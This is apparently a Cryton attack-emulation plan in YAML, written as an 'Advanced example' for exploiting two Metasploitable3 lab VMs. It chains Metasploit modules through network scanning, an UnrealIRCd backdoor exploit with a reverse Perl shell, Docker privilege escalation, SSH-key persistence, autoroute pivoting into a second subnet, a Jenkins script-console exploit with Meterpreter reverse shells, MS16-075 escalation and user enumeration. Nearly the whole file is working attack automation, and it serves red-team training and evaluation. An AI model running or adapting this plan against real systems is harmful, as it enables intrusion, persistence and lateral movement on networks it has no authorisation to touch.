plan:
  name: Advanced example
  owner: Siemens
  plan_info:
    description: "Evaluation scenario to exploit two Metasploitable3 VMs with pivoting techniques."
  stages:
  - name: network-scan-subnet1
    trigger_type: delta
    trigger_args:
      seconds: 1
    steps:
    - name: local-nmap-scanning
      step_type: cryton/execute-on-worker
      info:
        source: "attacker"
        target: "network-1"
        action: "Scan network one for common ports"
      is_init: true
      arguments:
        attack_module: mod_nmap
        attack_module_args:
          target: "172.28.128.0/24"
          options: "-T4"
          std_out: true

  - name: exploit-ubuntu-metasploitable3-vm
    trigger_type: delta
    trigger_args:
      seconds: 2
    depends_on:
      - network-scan-subnet1
    steps:
    - name: exploit-ircd
      step_type: cryton/execute-on-worker
      info:
        source: "attacker"
        target: "metasploitable3-ubuntu"
        action: "Exploit IRCD backdoor"
      is_init: true
      arguments:
        create_named_session: session_to_target_1
        attack_module: mod_msf_module
        attack_module_args:
          module_type: "exploit"
          module_name: "unix/irc/unreal_ircd_3281_backdoor"
          module_options:
            RHOSTS: "172.28.128.99"
            RPORT: "6697"
          payload_name: "cmd/unix/reverse_perl"
          payload_options:
            LHOST: "172.28.128.3"
            LPORT: "6677"
          run_as_job: true
          exploit_timeout_in_sec: 15
          exploit_retries: 7
          session_timeout_in_sec: 20

  - name: ubuntu-metasploitable3-vm-local-privilege-escalation
    trigger_type: delta
    trigger_args:
      seconds: 5
    depends_on:
    - exploit-ubuntu-metasploitable3-vm
    steps:
    - name: exploit-dockerd-privesc
      info:
        source: "TODO"
        target: "TODO"
        action: "TODO"
      step_type: cryton/execute-on-worker
      is_init: true
      arguments:
        create_named_session: session_to_target_1_root
        use_named_session: session_to_target_1
        attack_module: mod_msf_module
        attack_module_args:
          module_type: "exploit"
          module_name: "linux/local/docker_daemon_privilege_escalation"
          payload_name: "linux/x64/meterpreter/reverse_tcp"
          payload_options:
            LHOST: "172.28.128.3"
            LPORT: "4444"
          run_as_job: false
          exploit_timeout_in_sec: 60
          exploit_retries: 5
          session_timeout_in_sec: 30

  - name: ubuntu-metasploitable3-vm-add-ssh-key
    trigger_type: delta
    trigger_args:
      seconds: 5
    depends_on:
      - ubuntu-metasploitable3-vm-local-privilege-escalation
    steps:
      - name: exploit-dockerd-privesc
        info:
          source: "TODO"
          target: "TODO"
          action: "TODO"
        step_type: cryton/execute-on-worker
        is_init: true
        arguments:
          use_named_session: session_to_target_1_root
          attack_module: mod_msf_module
          attack_module_args:
            module_type: "post"
            module_name: "linux/manage/sshkey_persistence"
            payload_options:
              USERNAME: "vagrant"
            run_as_job: false

  - name: add-msf-route-to-subnet2
    trigger_type: delta
    trigger_args:
      seconds: 5
    depends_on:
    - ubuntu-metasploitable3-vm-add-ssh-key
    steps:
    - name: set-msf-route
      info:
        source: "TODO"
        target: "TODO"
        action: "TODO"
      step_type: cryton/execute-on-worker
      is_init: true
      arguments:
        use_named_session: session_to_target_1_root
        attack_module: mod_msf_module
        attack_module_args:
          module_type: "post"
          module_name: "multi/manage/autoroute"
          module_options:
            CMD: "add"
            NETMASK: "255.255.255.0"
            SUBNET: "192.168.56.0"
          payload_name: "cmd/unix/reverse_perl"
          payload_options:
            LHOST: "172.28.128.3"
            LPORT: "4444"
          run_as_job: false
          exploit_timeout_in_sec: 20
          exploit_retries: 3


  - name: pivot-tcp-scan-subnet2
    trigger_type: delta
    trigger_args:
      seconds: 5
    depends_on:
    - add-msf-route-to-subnet2
    steps:
    - name: pivot-scan-network-2
      info:
        source: "TODO"
        target: "TODO"
        action: "TODO"
      step_type: cryton/execute-on-worker
      is_init: true
      arguments:
        attack_module: mod_msf_module
        attack_module_args:
          module_type: "auxiliary"
          module_name: "scanner/portscan/tcp"
          module_options:
            PORTS: "20-25,53,80,135,443,3389,8000,8080,8443,8888"
            RHOSTS: "192.168.56.0/24"
            THREADS: 10
            TIMEOUT: 250
          run_as_job: false
          exploit_timeout_in_sec: 900
          exploit_retries: 1



  - name: exploit-windows-metasploitable3-vm
    trigger_type: delta
    trigger_args:
      seconds: 5
    depends_on:
    - pivot-tcp-scan-subnet2
    steps:
    - name: target-metasploitable3-windows
      info:
        source: "TODO"
        target: "TODO"
        action: "TODO"
      step_type: cryton/execute-on-worker
      is_init: true
      arguments:
        create_named_session: session_to_target_2
        attack_module: mod_msf_module
        attack_module_args:
          module_type: "exploit"
          module_name: "multi/http/jenkins_script_console"
          module_options:
            RHOSTS: "192.168.56.98"
            RPORT: "8484"
            TARGETURI: "/"
          payload_name: "windows/x64/meterpreter/reverse_tcp"
          payload_options:
            LHOST: "192.168.56.99"
            LPORT: "6677"
          run_as_job: true
          exploit_timeout_in_sec: 60
          exploit_retries: 5
          session_timeout_in_sec: 60


  - name: whoami-windows-metasploitable3-vm
    trigger_type: delta
    trigger_args:
      seconds: 3
    depends_on:
    - exploit-windows-metasploitable3-vm
    steps:
    - name: target_2_whoami
      info:
        source: "TODO"
        target: "TODO"
        action: "TODO"
      step_type: cryton/execute-on-worker
      is_init: true
      arguments:
        use_named_session: session_to_target_2
        attack_module: mod_msf_module
        attack_module_args:
          module_type: "post"
          module_name: "multi/general/execute"
          module_options:
            COMMAND: "whoami"
          exploit_timeout_in_sec: 20
          exploit_retries: 3


  - name: privilege-escalation-windows-metasploitable3-vm
    trigger_type: delta
    trigger_args:
      seconds: 5
    depends_on:
    - whoami-windows-metasploitable3-vm
    steps:
    - name: target-metasploitable3-windows
      info:
        source: "TODO"
        target: "TODO"
        action: "TODO"
      step_type: cryton/execute-on-worker
      is_init: true
      arguments:
        create_named_session: session_to_target_2_root
        use_named_session: session_to_target_2
        attack_module: mod_msf_module
        attack_module_args:
          module_type: "exploit"
          module_name: "windows/local/ms16_075_reflection_juicy"
          payload_name: "windows/x64/meterpreter/reverse_tcp"
          payload_options:
            LHOST: "192.168.56.99"
            LPORT: "6687"
          run_as_job: true
          exploit_timeout_in_sec: 60
          exploit_retries: 5
          session_timeout_in_sec: 30

  - name: extract-data-from-windows-metasploitable3-vm
    trigger_type: delta
    trigger_args:
      seconds: 3
    depends_on:
    - privilege-escalation-windows-metasploitable3-vm
    steps:
    - name: windows-metasploitable3-whoami
      info:
        source: "TODO"
        target: "TODO"
        action: "TODO"
      step_type: cryton/execute-on-worker
      is_init: true
      arguments:
        use_named_session: session_to_target_2_root
        attack_module: mod_msf_module
        attack_module_args:
          module_type: "post"
          module_name: "multi/general/execute"
          module_options:
            COMMAND: "whoami /all"
          exploit_timeout_in_sec: 20
          exploit_retries: 3
      next:
        - type: result
          value: OK
          step: target_2_tasklist
    - name: windows-metasploitable3-get-list-of-users
      info:
        source: "TODO"
        target: "TODO"
        action: "TODO"
      step_type: cryton/execute-on-worker
      arguments:
        use_named_session: session_to_target_2_root
        attack_module: mod_msf_module
        attack_module_args:
          module_type: "post"
          module_name: "multi/general/execute"
          module_options:
            COMMAND: "net user"
          exploit_timeout_in_sec: 20
          exploit_retries: 3
